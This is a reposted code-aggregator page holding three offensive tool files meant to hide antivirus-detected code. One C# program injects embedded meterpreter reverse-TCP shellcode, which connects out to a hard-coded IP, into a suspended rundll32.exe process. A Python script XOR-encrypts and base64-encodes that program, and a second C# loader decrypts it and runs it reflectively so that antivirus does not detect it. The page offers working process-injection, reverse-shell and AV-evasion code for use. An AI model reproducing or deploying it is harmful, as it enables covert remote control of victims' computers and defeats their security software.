csharp 将AV检测到的组件隐藏到另一个组件中

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了csharp 将AV检测到的组件隐藏到另一个组件中相关的知识,希望对你有一定的参考价值。

/*
Author: Arno0x0x, Twitter: @Arno0x0x

===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs

*/

using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
using System;
using System.Text;

public class nastyLittleDuck
{

    [StructLayout(LayoutKind.Sequential)]
    public class SecurityAttributes
    {
        public Int32 Length = 0;
        public IntPtr lpSecurityDescriptor = IntPtr.Zero;
        public bool bInheritHandle = false;

        public SecurityAttributes()
        {
            this.Length = Marshal.SizeOf(this);
        }
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct ProcessInformation
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public Int32 dwProcessId;
        public Int32 dwThreadId;
    }

    [Flags]
    public enum CreateProcessFlags : uint
    {
        DEBUG_PROCESS = 0x00000001,
        DEBUG_ONLY_THIS_PROCESS = 0x00000002,
        CREATE_SUSPENDED = 0x00000004,
        DETACHED_PROCESS = 0x00000008,
        CREATE_NEW_CONSOLE = 0x00000010,
        NORMAL_PRIORITY_CLASS = 0x00000020,
        IDLE_PRIORITY_CLASS = 0x00000040,
        HIGH_PRIORITY_CLASS = 0x00000080,
        REALTIME_PRIORITY_CLASS = 0x00000100,
        CREATE_NEW_PROCESS_GROUP = 0x00000200,
        CREATE_UNICODE_ENVIRONMENT = 0x00000400,
        CREATE_SEPARATE_WOW_VDM = 0x00000800,
        CREATE_SHARED_WOW_VDM = 0x00001000,
        CREATE_FORCEDOS = 0x00002000,
        BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
        ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
        INHERIT_PARENT_AFFINITY = 0x00010000,
        INHERIT_CALLER_PRIORITY = 0x00020000,
        CREATE_PROTECTED_PROCESS = 0x00040000,
        EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
        PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
        PROCESS_MODE_BACKGROUND_END = 0x00200000,
        CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
        CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
        CREATE_DEFAULT_ERROR_MODE = 0x04000000,
        CREATE_NO_WINDOW = 0x08000000,
        PROFILE_USER = 0x10000000,
        PROFILE_KERNEL = 0x20000000,
        PROFILE_SERVER = 0x40000000,
        CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
    }

    [Flags]
    public enum DuplicateOptions : uint
    {
        DUPLICATE_CLOSE_SOURCE = 0x00000001,
        DUPLICATE_SAME_ACCESS = 0x00000002
    }

    [StructLayout(LayoutKind.Sequential)]
    public class StartupInfo
    {
        public Int32 cb = 0;
        public IntPtr lpReserved = IntPtr.Zero;
        public IntPtr lpDesktop = IntPtr.Zero; // MUST be Zero
        public IntPtr lpTitle = IntPtr.Zero;
        public Int32 dwX = 0;
        public Int32 dwY = 0;
        public Int32 dwXSize = 0;
        public Int32 dwYSize = 0;
        public Int32 dwXCountChars = 0;
        public Int32 dwYCountChars = 0;
        public Int32 dwFillAttribute = 0;
        public Int32 dwFlags = 0;
        public Int16 wShowWindow = 0;
        public Int16 cbReserved2 = 0;
        public IntPtr lpReserved2 = IntPtr.Zero;
        public IntPtr hStdInput = IntPtr.Zero;
        public IntPtr hStdOutput = IntPtr.Zero;
        public IntPtr hStdError = IntPtr.Zero;

        public StartupInfo()
        {
            this.cb = Marshal.SizeOf(this);
        }
    }

    [Flags()]
    public enum AllocationType : uint
    {
        COMMIT = 0x1000,
        RESERVE = 0x2000,
        GO = 0x3000,
        RESET = 0x80000,
        LARGE_PAGES = 0x20000000,
        PHYSICAL = 0x400000,
        TOP_DOWN = 0x100000,
        WRITE_WATCH = 0x200000
    }


    [Flags()]
    public enum MemoryProtection : uint
    {
        EXECUTE = 0x10,
        EXECUTE_READ = 0x20,
        EXECUTE_READWRITE = 0x40,
        EXECUTE_WRITECOPY = 0x80,
        NOACCESS = 0x01,
        READONLY = 0x02,
        READWRITE = 0x04,
        WRITECOPY = 0x08,
        GUARD_Modifierflag = 0x100,
        NOCACHE_Modifierflag = 0x200,
        WRITECOMBINE_Modifierflag = 0x400
    }

    // CreateProcessA
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateProcessA(
            String lpApplicationName,
            String lpCommandLine,
            SecurityAttributes lpProcessAttributes,
            SecurityAttributes lpThreadAttributes,
            Boolean bInheritHandles,
            CreateProcessFlags dwCreationFlags,
            IntPtr lpEnvironment,
            String lpCurrentDirectory,
            [In] StartupInfo lpStartupInfo,
            out ProcessInformation lpProcessInformation

        );

    // VirtualAllocEx
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAllocEx(
           IntPtr lpHandle,
           IntPtr lpAddress,
           IntPtr dwSize,
           AllocationType flAllocationType,
           MemoryProtection flProtect
        );

    // WriteProcessMemory
    [DllImport("kernel32.dll")]
    public static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] buffer,
        IntPtr dwSize,
        int lpNumberOfBytesWritten);

    // TerminateProcess

    [DllImport("kernel32.dll")]
    public static extern bool TerminateProcess(
        IntPtr hProcess, 
        uint uExitCode);

    // CreateRemoteThread
    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(
        IntPtr hProcess,
        IntPtr lpThreadAttributes,
        uint dwStackSize,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        uint dwCreationFlags,
        IntPtr lpThreadId);

    public static void Main()
    {
		// Name of the binary to inject the shellcode into
		string binary = "rundll32.exe";
		
		// Shellcode obtained with 'msfvenom -a x64 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.134 -f csharp'
		byte[] sc = new byte[333] {
				0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
				0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
				0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
				0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
				0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
				0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
				0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
				0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
				0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
				0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
				0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
				0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x34,0x86,0x68,0x02,
				0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
				0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
				0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,
				0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
				0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
				0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
				0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,
				0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
				0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,
				0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,
				0x53,0xff,0xd5 };
        
		
        IntPtr size = new IntPtr(sc.Length);
        StartupInfo sInfo = new StartupInfo();
        sInfo.dwFlags = 0;
        ProcessInformation pInfo;
        string binaryPath = "";
        // We check what architecture OS it is here

        if (Environment.GetEnvironmentVariable("ProgramW6432").Length > 0)
        {
            //64 bit
            binaryPath = Environment.GetEnvironmentVariable("windir") + "\\SysWOW64\\" + binary;
        }
        else
        {
            //32 bit
            binaryPath = Environment.GetEnvironmentVariable("windir") + "\\System32\\" + binary;
        }

        // We have select the correct directory, for the executeable

        // Create the Process in SUSPENDED state
        IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
        IntPtr hProcess = pInfo.hProcess;
        if (hProcess.ToString() != "0") { 
            // Use VirtualAllocEx to create some space
            IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, AllocationType.GO, MemoryProtection.EXECUTE_READWRITE);

            if (spaceAddr.ToString() == "0")
            {
                // TerminateProcess incase failed to Valloc for some reason.
                TerminateProcess(hProcess, 0);
            }
            else
            {
                // Use WriteProcessMemory to WRITE "POKEMON" in
                int test = 0;

                IntPtr size2 = new IntPtr(sc.Length);
                bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);

                 // CreateRemoteThread to start it up
                CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));

            }
        }
       //Process.Start(shellcode);
    }
}
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#

import argparse
from base64 import b64encode

#------------------------------------------------------------------------
# data as a bytearray
# key as a string
def xor(data, key):
	l = len(key)
	keyAsInt = map(ord, key)
	return bytes(bytearray((
	    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
	)))

#======================================================================================================
#											HELPERS FUNCTIONS
#======================================================================================================

#------------------------------------------------------------------------
def color(string, color=None):
    """
    Author: HarmJ0y, borrowed from Empire
    Change text color for the Linux terminal.
    """
    
    attr = []
    # bold
    attr.append('1')
    
    if color:
        if color.lower() == "red":
            attr.append('31')
        elif color.lower() == "green":
            attr.append('32')
        elif color.lower() == "blue":
            attr.append('34')
        return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)

    else:
        if string.strip().startswith("[!]"):
            attr.append('31')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[+]"):
            attr.append('32')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[?]"):
            attr.append('33')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[*]"):
            attr.append('34')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        else:
            return string

#======================================================================================================
#											MAIN FUNCTION
#======================================================================================================
if __name__ == '__main__':

	# Parse arguments
	parser = argparse.ArgumentParser()
	parser.add_argument("inFile", help="File name to be xor encrypted then base64 encoded")
	parser.add_argument("key", help="Key used to XOR or AES encryption the shellcode")
	parser.add_argument("outFile", help="output file name (resulting)")
	args = parser.parse_args() 
	
	#------------------------------------------------------------------------
	# Open the file and read all bytes from it
	try:
		with open(args.inFile) as fileHandle:
			fileBytes = bytearray(fileHandle.read())
			fileHandle.close()
			print color("[*] File [{}] successfully loaded".format(args.inFile))
	except IOError:
		print color("[!] Could not open or read file [{}]".format(args.inFile))
		quit()
		
	#------------------------------------------------------------------------
	# Encrypt the file and save a base64 representation 
	try:
		with open(args.outFile, 'w+') as fileHandle:
			fileHandle.write(b64encode(xor(fileBytes, args.key)))
			fileHandle.close()
			print color("[+] Output file [{}] saved successfully".format(args.outFile))
	except IOError:
		print color("[!] Could not write file [{}]".format(args.outFile))
/*
Author: Arno0x0x, Twitter: @Arno0x0x

===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:not_detected.exe not_detected.cs

*/

using System;
using System.Reflection;
using System.Text;

public class nastyLittleDuck
{
	private static byte[] xor(byte[] cipher, byte[] key) {
		byte[] decrypted = new byte[cipher.Length];
		for(int i = 0; i < cipher.Length; i++) {
			decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]);
		}
		return decrypted;

	}
		
	public static void Main()
	{
		// String obtained using './encryptFile.py detected.exe nastyLittleDuck detected.b64'
		string cryptoAssembly = "PASTE HERE THE RESULTING FILE";
		byte[] data = xor(Convert.FromBase64String(cryptoAssembly), Encoding.ASCII.GetBytes("nastyLittleDuck"));
		Assembly a = Assembly.Load(data);
		MethodInfo method = a.EntryPoint;
		object o = a.CreateInstance(method.Name);
		method.Invoke(o, null);
	}
}

以上是关于csharp 将AV检测到的组件隐藏到另一个组件中的主要内容,如果未能解决你的问题,请参考以下文章

重定向到将一些值传递给重定向到的组件

Angular 2组件未导航到另一个组件

如何从另一个组件返回到另一个组件而不以角度重新加载组件?

安卓padvideo组件去掉控件

将 API 数据从一个组件传递到另一个组件?

以角度将数据从一个组件传递到另一个组件